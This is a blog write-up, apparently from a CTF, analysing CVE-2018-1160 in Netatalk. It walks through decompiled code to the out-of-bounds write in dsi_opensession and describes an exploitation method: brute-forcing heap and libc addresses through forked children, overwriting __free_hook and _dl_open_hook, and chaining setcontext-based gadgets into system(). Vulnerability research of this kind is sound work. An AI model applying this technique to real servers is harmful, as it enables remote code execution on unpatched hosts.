CVE-2018-1160 POC

Posted on Jun 10, 2025

Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.

Finding the sink and the source

I decided to start inspecting the pure binaries, to also work on my reversing skills.

Library

We create a new ghidra project, and inspect first afpd. We see that a lot dsi_* functions are imported. This is important, as the cve advisory mentions that the vulnerability is inside dsi_opensess.

We got only two binaries, afpd and libatalk. Let’s add the library to the project and inspect it. We immediately find the dsi_opensession function.

Analysing the code we want to rename variables and add comments to make going through the code easier.


void dsi_opensession(long acid)

{
  int iVar1;
  uint acid_length;
  uint uVar2;
  int *piVar3;
  char *pcVar4;
  undefined1 *acid_6e8;
  long lVar5;
  ulong uVar6;
  undefined8 *puVar7;
  ulong uVar8;
  byte bVar9;
  undefined8 *acid_6d8;
  byte acid_element;
  undefined8 *value;
  
  bVar9 = 0;
  iVar1 = setnonblock(*(undefined4 *)(acid + 0x10714));
  if (iVar1 < 0) {
     if (1 < DAT_0037fa48) {
        piVar3 = __errno_location();
        pcVar4 = strerror(*piVar3);
        make_log_entry(2,4,"dsi_opensess.c",0x1a,"dsi_opensession: setnonblock: %s",pcVar4);
     }
     netatalk_panic("setnonblock error");
                            /* WARNING: Subroutine does not return */
     abort();
  }
  uVar6 = 0;
  acid_6e8 = *(undefined1 **)(acid + 0x6e8);
  acid_6d8 = (undefined8 *)(acid + 0x6d8);
  if (*(long *)(acid + 0x106f8) != 0) {
     do {
        while( true ) {
                            /* acid_6e8[uvar6] == type */
           iVar1 = (int)uVar6;
           uVar8 = (ulong)(iVar1 + 1);
                            /* acid_6e8[uvar8] == length */
           acid_element = acid_6e8[uVar8]; // [1] -> we control the length
           acid_length = (uint)acid_element;
           if (acid_6e8[uVar6] != '\x01') break;
           value = (undefined8 *)(acid_6e8 + uVar8 + 1);
           if (acid_length < 8) {
			//[snip] - we don't care about lower lengths
           }
           else {
              *acid_6d8 = *value;
              *(undefined8 *)(acid + 0x6d0 + (ulong)acid_length) =
                     *(undefined8 *)((long)value + ((ulong)acid_length - 8)); // [2] - write at attacker controlled offset
              puVar7 = (undefined8 *)(acid + 0x6e0U & 0xfffffffffffffff8);
              lVar5 = (long)acid_6d8 - (long)puVar7;
              value = (undefined8 *)((long)value - lVar5);
              for (uVar6 = (ulong)(acid_length + (int)lVar5 >> 3); uVar6 != 0; uVar6 = uVar6 - 1) {
                 *puVar7 = *value;
                 value = value + (ulong)bVar9 * -2 + 1;
                 puVar7 = puVar7 + (ulong)bVar9 * -2 + 1;
              }
LAB_00126098:
              acid_6e8 = *(undefined1 **)(acid + 0x6e8);
           }
           acid_length = *(uint *)(acid + 0x6d8);
                            /* ntoh transformation */
           *(uint *)(acid + 0x6d8) =
                  acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
                  acid_length << 0x18;
           uVar6 = (ulong)(iVar1 + 2 + (uint)(byte)acid_6e8[uVar8]);
           if (*(ulong *)(acid + 0x106f8) <= uVar6) goto LAB_00125fd0;
        }
        uVar6 = (ulong)(iVar1 + 2 + acid_length);
     } while (uVar6 < *(ulong *)(acid + 0x106f8));
  }
LAB_00125fd0:
  *(undefined8 *)(acid + 0x106f8) = 0xc;
  *(undefined1 *)(acid + 0x598) = 1;
  *(undefined4 *)(acid + 0x59c) = 0;
  *acid_6e8 = 0;
  *(undefined1 *)(*(long *)(acid + 0x6e8) + 1) = 4;
  acid_length = *(uint *)(acid + 0x6e0);
                            /* ntoh transformation */
  uVar2 = acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
              acid_length << 0x18;
  if (acid_length < 32000) {
     uVar2 = 0x1000;
  }
  *(uint *)(*(long *)(acid + 0x6e8) + 2) = uVar2;
  *(undefined1 *)(*(long *)(acid + 0x6e8) + 6) = 2;
  *(undefined1 *)(*(long *)(acid + 0x6e8) + 7) = 4;
  *(undefined4 *)(*(long *)(acid + 0x6e8) + 8) = 0x80000000;
  acid_length = (uint)*(undefined8 *)(acid + 0x106f8);
                            /* ntoh transformation */
  *(uint *)(acid + 0x5a0) =
          acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
          acid_length << 0x18;
  dsi_stream_send(acid,*(undefined8 *)(acid + 0x6e8));
  return;
}

The first important part of the code, is at [1], here we have TLV (type-length-value) structure. All these fields are attacker controled. We want to focus especially on the length. At [2], the length is used to write to a buffer, without any bound checks, allowing an attacker to write at arbitrary addresses in memory.

This seems to be a classic out of bounds write.

The line *(undefined8 *)(acid + 0x6d0 + (ulong)acid_length) = *(undefined8 *)((long)value + ((ulong)acid_length - 8)); copies bytes from value + (acid_length - 8) to the destination at acid + 0x6d0 + acid_length. So, we can write an arbitrary value at an arbitrary address. Also, lucky for us, that value shouldn’t be overwritten further in the code, so once we write out bytes at a desired address, we are done with them.

Now, that we discovered the sink, we must discover the source - how an unauthenticated remote attacker can interact with this code, and how can this bug be exploited.

The dsi_opensession function is called only by dsi_getsession.

dsi_getsession is called by no other function inside the library code, however it is exported to the main binary, so we will probably want to look there to find the actual source.

However, we must also understand what happens at this level.

A socket is created, and set to nonblock. Then, fork is used to create a child process. This is important to us, as only if the fork call succeeds will the dsi_getsession function be called.

If fork succeeds, here is the code that interests us:

  if (__pid == 0) {
  /* block 1 */
	lVar7 = *(long *)((long)param_1 + 8);
	*(undefined4 *)(lVar7 + 0x2370) = *(undefined4 *)(param_2 + 0x28);
	*(undefined4 *)(lVar7 + 0x2374) = *(undefined4 *)(param_2 + 0x2c);
	*(int *)(lVar7 + 0x2358) = local_cc;
	close(sock);
	close(*(int *)((long)param_1 + 0x10718));
	*(undefined4 *)((long)param_1 + 0x10718) = 0xffffffff;
	server_child_free(param_2);

/* block 2 */
	if (*(char *)((long)param_1 + 0x599) == '\x03') {
	  dsi_getstatus(param_1);
	  p_Var9 = (__fd_mask *)local_c8;
	  for (lVar7 = 0x10; lVar7 != 0; lVar7 = lVar7 + -1) {
		*p_Var9 = uVar8;
		p_Var9 = p_Var9 + 1;
	  }
	  lVar7 = __fdelt_chk((long)*(int *)((long)param_1 + 0x10714));
	  local_c8[lVar7] =
		   local_c8[lVar7] | 1L << ((byte)(*(int *)((long)param_1 + 0x10714) % 0x40) & 0x3f);
	  free(param_1);
	  select(0x400,(fd_set *)local_c8,(fd_set *)0x0,(fd_set *)0x0,(timeval *)&DAT_0037f5d0);
			/* WARNING: Subroutine does not return */
	  exit(0);
	}
/* block 3 */
	if (*(char *)((long)param_1 + 0x599) != '\x04') {
	  if (4 < debug_level) {
		make_log_entry(5,4,"dsi_getsess.c",0x79,"DSIUnknown %d");
	  }
	  (**(code **)((long)param_1 + 0x10760))(param_1);
			/* WARNING: Subroutine does not return */
	  exit(1);
	}
/* block 4 */
	*(long *)((long)param_1 + 0x6b8) = (long)param_3;
	*(long *)((long)param_1 + 0x6a8) = (long)param_3;
	*(undefined8 *)((long)param_1 + 0x6c0) = 0;
	*(undefined8 *)((long)param_1 + 0x6b0) = 0;
	dsi_opensession(param_1);
	*param_4 = 0;
	uVar8 = (ulong)uVar2;
  }

Let’s split this in blocks

lVar7 = *(long *)((long)param_1 + 8);
*(undefined4 *)(lVar7 + 0x2370) = *(undefined4 *)(param_2 + 0x28);
*(undefined4 *)(lVar7 + 0x2374) = *(undefined4 *)(param_2 + 0x2c);
*(int *)(lVar7 + 0x2358) = local_cc;
close(sock);
close(*(int *)((long)param_1 + 0x10718));
*(undefined4 *)((long)param_1 + 0x10718) = 0xffffffff;
server_child_free(param_2);

Update Session Structure:

lVar7 = *(long *)((long)param_1 + 8) gets a pointer from param_1 + 8 (likely a session or server structure).
Copies fields from param_2 + 0x28 and param_2 + 0x2c (likely server configuration, e.g., port or address) to lVar7 + 0x2370 and lVar7 + 0x2374.
Sets lVar7 + 0x2358 to local_cc (the child’s socket for communication).

Close Unused Sockets:

Closes local_d0 (parent’s socket, not needed in child).
Closes the socket at param_1 + 0x10718 (likely the original client socket) and sets it to -1.

Impact on dsi_opensession:

Sets up the session structure (param_1) with the child’s socket (local_cc), which dsi_opensession uses (at acid + 0x10714) for non-blocking I/O.
Ensures param_1 is ready for session processing.

if (*(char *)((long)param_1 + 0x599) == '\x03') {
  dsi_getstatus(param_1);
  p_Var9 = (__fd_mask *)local_c8;
  for (lVar7 = 0x10; lVar7 != 0; lVar7 = lVar7 + -1) {
	*p_Var9 = uVar8;
	p_Var9 = p_Var9 + 1;
  }
  lVar7 = __fdelt_chk((long)*(int *)((long)param_1 + 0x10714));
  local_c8[lVar7] =
	   local_c8[lVar7] | 1L << ((byte)(*(int *)((long)param_1 + 0x10714) % 0x40) & 0x3f);
  free(param_1);
  select(0x400,(fd_set *)local_c8,(fd_set *)0x0,(fd_set *)0x0,(timeval *)&DAT_0037f5d0);
		/* WARNING: Subroutine does not return */
  exit(0);
}

param_1 + 0x599 represents the command received. In this case, if the command is \x03, dsi_getstatus is called, and the child process exits. We want to avoid falling in this branch.

if (*(char *)((long)param_1 + 0x599) != '\x04') {
  if (4 < debug_level) {
	make_log_entry(5,4,"dsi_getsess.c",0x79,"DSIUnknown %d");
  }
  (**(code **)((long)param_1 + 0x10760))(param_1);
		/* WARNING: Subroutine does not return */
  exit(1);
}

If the command is different from \x03 or \0x04 it is invalid, so the child process exists with an error. This means, that to reach the next block (that is our golden block - as it calls dsi_opensession) we must set this byte to \x04.

*(long *)((long)param_1 + 0x6b8) = (long)param_3;
*(long *)((long)param_1 + 0x6a8) = (long)param_3;
*(undefined8 *)((long)param_1 + 0x6c0) = 0;
*(undefined8 *)((long)param_1 + 0x6b0) = 0;
dsi_opensession(param_1);
*param_4 = 0;
uVar8 = (ulong)uVar2;

Finally, we get the to the block that calls dsi_opensession.

This sets two values from the param_1 structure to param_3 (likely some sort of timeouts), and another two values to 0.

Then, we finally call our sink function.

Now, is time to finally move to the main binary and check the calls made to dsi_getsession.

Main Binary

As previously mentioned, the main binary only imports dsi_getsession. This function is called only once, in the main function.

main is a bit too big to go into all details here. This is the high-level summary of this code.

The main function initializes the Netatalk server by:

Parsing command-line and configuration files.
Setting up signal handlers and file descriptor limits.
Initializing the socket handler and CNID database.
Entering a poll loop to handle incoming connections and child process events.
Calling dsi_getsession for new connections, which forks a child process and calls dsi_opensession for DSI_OPENSESSION commands.
Managing configuration reloads and child process cleanup.

This is the outline of the main_poll_loop, it waits for events on file descriptors. When the poll loop detects incoming connections, leading to session creation => call of dsi_getsession.

main_poll_loop:
do {
  while( true ) {
    pthread_sigmask(1,&local_158,(__sigset_t *)0x0);
    iVar5 = poll((pollfd *)*plVar14,(long)*(int *)((long)plVar14 + 0x14),-1);
    pthread_sigmask(0,&local_158,(__sigset_t *)0x0);
    if (DAT_0035c5b0 == 0) break;
    ...
  }
  ...
} while( true );

This is the code responsible for handling events.

if (iVar5 != 0) {
  if (iVar5 < 0) {
    if (__errnum != 4) {
      if (1 < (uint)type_configs._56_4_) {
        pcVar9 = strerror(__errnum);
        make_log_entry(2,3,"main.c",0x198,"main: can\'t wait for input: %s",pcVar9);
      }
      return 0;
    }
  }
  else {
    lVar11 = 0;
    if (0 < *(int *)((long)DAT_0035c5a8 + 0x14)) {
      do {
        if ((*(byte *)(*plVar14 + 6 + lVar11 * 8) & 0x39) != 0) {
          piVar8 = (int *)(lVar11 * 0x10 + plVar14[1]);
          if (*piVar8 == 0) {
            ...
          }
          else if (*piVar8 == 1) {
            uVar12 = *(undefined8 *)(piVar8 + 2);
            local_168.rlim_cur = 0;
            iVar5 = dsi_getsession(uVar12,DAT_0035c5b8,DAT_0035c5e4,&local_168);
            ...
          }
        }
        lVar11 = lVar11 + 1;
      } while (iVar5 + 1 < *(int *)((long)plVar14 + 0x14));
    }
  }
}

If poll returns events (iVar5 > 0):

Iterates over file descriptors in DAT_0035c5a8.
For each event, checks the type at piVar8:
If 0, handles IPC requests from children (ipc_server_read).
If 1, calls dsi_getsession(uVar12, DAT_0035c5b8, DAT_0035c5e4, &local_168) to start a new session.

uVar12 becomes param_1 in dsi_getsession, passed as acid to dsi_opensession. Also, uVar12 contains the client’s network packet - acid_6e8.

Before being passed as an argument uVar12 gets assigned a pointer from piVar8. uVar12 = *(undefined8 *)(piVar8 + 2);

Now, we know the complete flow of how a data packet gets from an attacker to the sink.

We can also confirm our analysis looking at the packet layout as per the specifications: https://en.wikipedia.org/wiki/Data_Stream_Interface.

dsi_hdr  = struct.pack(">BBHLLL",
                       0x00,          # Flags  (request)
                       0x04,          # Command (OpenSession)
                       0x0001,        # Req-ID
                       0x00000000,    # Error / Offset
                       0x00000006,    # Data-len
                       0x00000000)    # Reserved

option   = struct.pack(">BBL",
                       0x00,          # DSIOPT_SERVQUANT
                       0x04,          # length
                       0x00004000)    # 16 KB

Exploiting

While we found our sink using nothing but the provided binaries, we would like to have access to the source code as well, as it is open source. This code is using custom data structures that are hard to follow so it is hard to pinpoint exactly what we are overwriting. The only solution to continue analysing properly while relying only on the binary would be to create a custom datatype in Ghidra, but this seems like an overkill.

The write out of bounds in the source code looks like this:

case DSIOPT_ATTNQUANT:  
memcpy(&dsi->attn_quantum, dsi->commands + i + 1,  
dsi->commands[i]);

dsi->commands + i + 1 -> is the value dsi->commands[i] -> is the length and we overwrite dsi->attn_quantum Also, note that dsi->commands has a maximum length of 255 bytes.

typedef struct DSI {  
    struct DSI *next;             /* multiple listening addresses */  
    AFPObj   *AFPobj;  
    int      statuslen;  
    char     status[1400];  
    char     *signature;  
    struct dsi_block        header;  
    struct sockaddr_storage server, client;  
    struct itimerval        timer;  
    int      tickle;            /* tickle count */  
    int      in_write;           
    
    int      msg_request;       /* pending message to the client */  
    int      down_request;      /* pending SIGUSR1 down in 5 mn */    
    uint32_t attn_quantum, datasize, server_quantum;  
    uint16_t serverID, clientID;  
    uint8_t  *commands; /* DSI receive buffer */  
    uint8_t  data[DSI_DATASIZ];    /* DSI reply buffer */  
    size_t   datalen, cmdlen;

This is how the DSI struct looks like. We can overwrite attn_quantum, datasize, server_quantum, serverID, clientID, commands and part of data.

What is dsi->commands used for? The comment hints that it is a receive buffer, hinting that it point to a buffer where an attacker can also write.

After the getsession call is made, a call to afp_over_dsi is made. This function has a main loop where it calls dsi_stream_receive(). Here the following call is made: dsi_stream_read(dsi, dsi->commands, dsi->cmdlen). This function reads data into dsi->commands.

Defeating ASLR

While the original exploit focused on an environment where this binary was not protected by ASLR, we must exploit in a more hardened environment. We don’t have / don’t know of any address leak vulnerability that could help us defeat ASLR.

However, remember that our code is running inside a fork(). This is important for us for 2 reasons:

We can crash the program as many times as we want. Alternatively, if the code was ran inside the main thread of execution a crash would mean crashing the target.
forks share the same address space with the main program. This means that if we find a valid address for a fork we find a valid address for any fork.

These two conditions work in our favour as it means we can try to guess a valid address and get an idea of the address space at runtime.

We know that we can overwrite the commands pointer. The neat part is that if the address is invalid (an address that’s not part of the heap), the fork crashes and we get no response from the server. If we manage to guess a correct address (wherever it may point on the heap) we get a garbage response. So, we can try to guess addresses until we get a response => we don’t need an address leak. Also, keep in mind we want to find a valid heap page, not necessarily granular address.

Finding `libc` base

However, for a valid exploit more than just a random heap address is needed. Ideally, we want to find the base address of libc.

Let’s say the address we leaked at the previous step is called leaked_addr. Because when brute-forcing each byte we started from 0XFF and went down, this means we will find a rather big heap address, so libc_base = leaked_addr - offset.

However, how can we now the offset? Well, we are going to guess it as well. The offset should be anywhere between 0 and 0xffff000. We are only going to try 0xXXXX000 values, so this shouldn’t take up a lot.

If we guessed the offset our exploit will work, otherwise it will fail.

Building a ROP chain

Now, armed with libc’s base address is time to build a ROP chain that we can use to get a shell.

Taking control

The first question here is how can we hijack the program’s execution flow? We have no possibility of overwriting the stack, so how can we somehow still do this? The answer is: hooks.

hooks are special variables (function pointers) within the libc library. Their purpose is for debugging memory allocation. By default, each hook is NULL. However, if it’s set to the address of a function, then every time the hooked function is called anywhere in the program, the program will instead call the function pointed to by the hook.

We can overwrite any of the hooks and make them point to wherever* we want. Then, anytime the function we hooked is called, our code is actually executed. Considering the flow of our exploit, free is the most logical target, as it gets called once we close the socket to free all the memory used for the new connection.

* - of course, it needs to be valid executable code, NX is a thing, it’s not the 91s anymore

Our goal is to somehow call system. However, we have a problem. When free() gets called it receives as an argument a pointer to whatever memory the program tries to free. If we overwrite __free_hook with the system address, system will get that pointer as an argument. Instead, we must pass a valid command as an argument.

Full takeover

A very useful gadgets when it comes to such exploits is setcontext. setcontext is a legitimate libc function that can restore a full CPU context (all registers, instruction pointer, stack pointer) from a special structure in memory.

; setcontext + 53
mov     rsp, [rdi+0a0h]
mov     rax, [rdi+80h]
mov     rbp, [rdi+78h]
mov     r12, [rdi+48h]
mov     r13, [rdi+50h]
mov     r14, [rdi+58h]
mov     r15, [rdi+60h]
mov     rax, [rdi+0a8h]
push    rcx
mov     rsi, [rdi+70h]
mov     rdx, [rdi+88h]
mov     rcx, [rdi+98h]
mov     r8,  [rdi+28h]
mov     r9,  [rdi+30h]
mov     rdi, [rdi+68h]
xor eax, eax
retn

Using setcontext we can place arbitrary values in both rdi and rip. If we overwrite rip with the system address and rdi with a valid command, then we get command execution.

However, we still have a problem - setcontext uses rdi to take the values it sets the pointers to from memory. So, before calling this function we must make rdi point to a memory address where we have stored just the right values.

Preparing for T-0 seconds

So, we must find a way to make rdi point to a controllable memory region - let’s call it mem.

_dl_open_hook is stored at an offset of +0x2BC0 from __free_hook. This means we can overwrite this address as well. This leads us to the libc_dlopen_mode + 56 gadget. This gadget first loads the value stored at the address of _dl_open_hook into the rax register. Then it calls the function pointer stored at the address now in rax.

mov     rax, qword ptr [rip + <offset_to__dl_open_hook>] ; essentially mov rax, cs:_dl_open_hook
call    qword ptr [rax]

The before-mentioned value is our mem pointer.

When libc_dlopen_mode + 56 calls rax, it basically calls a pointer stored at mem. (call **mem). We control this address, and will want to call fgetpos64 + 207.

mov     rdi, rax
call    qword ptr [rax + 0x20]

This gadget simply copies rax to rdi, then calls a function pointer stored at mem+0x20. This means that finally rdi points to mem and we are ready to call setcontext. Of course, we now want to store the setcontext+53 value at mem+0x20 so it gets called by this pointer.

Putting it all together

So, to recap, we have the following ROP chain:

We want to overwrite __free_hook and _dl_open_hook. __free_hook will point to our first gadget and _dl_open_hook to memory we control.

Now, when free() gets called the following chain of events happen:

libc sees that __free_hook != NULL so it calls the address stored there, which is libc_dlopen_mode + 56
libc_dlopen_mode + 56 copies the pointer from _dl_open_hook which is a pointer to mem into the rax register. Then, it calls the function pointer present at mem. This pointer must point to fgetpos64 + 207
fgetpos64 + 207 this gadget copies rax to rdi so now rdi points to mem. Finally, rax+0x20 (which is mem+0x20) is called. This should point to setcontext + 53
setcontext+53 will use mem to set the execution context. rdi will point to our command string, and rip to system. We can use SigreturnFrame() to easily prepare mem for this operation. Once these registers were correctly overwritten, when setcontext returns it will call rip, basically calling system("cmd").

After putting everything together and writting an exploit I got hit by a harsh reality: it takes time to brute-force things. Also, it didn’t help that my connection to the server was weak.

After some digging I found out that the server is hosted in Japan. I deployed a small VPS machine in Japan, and ran the exploit from that machine. The ping time was ~600 times faster, and so was the exploit time.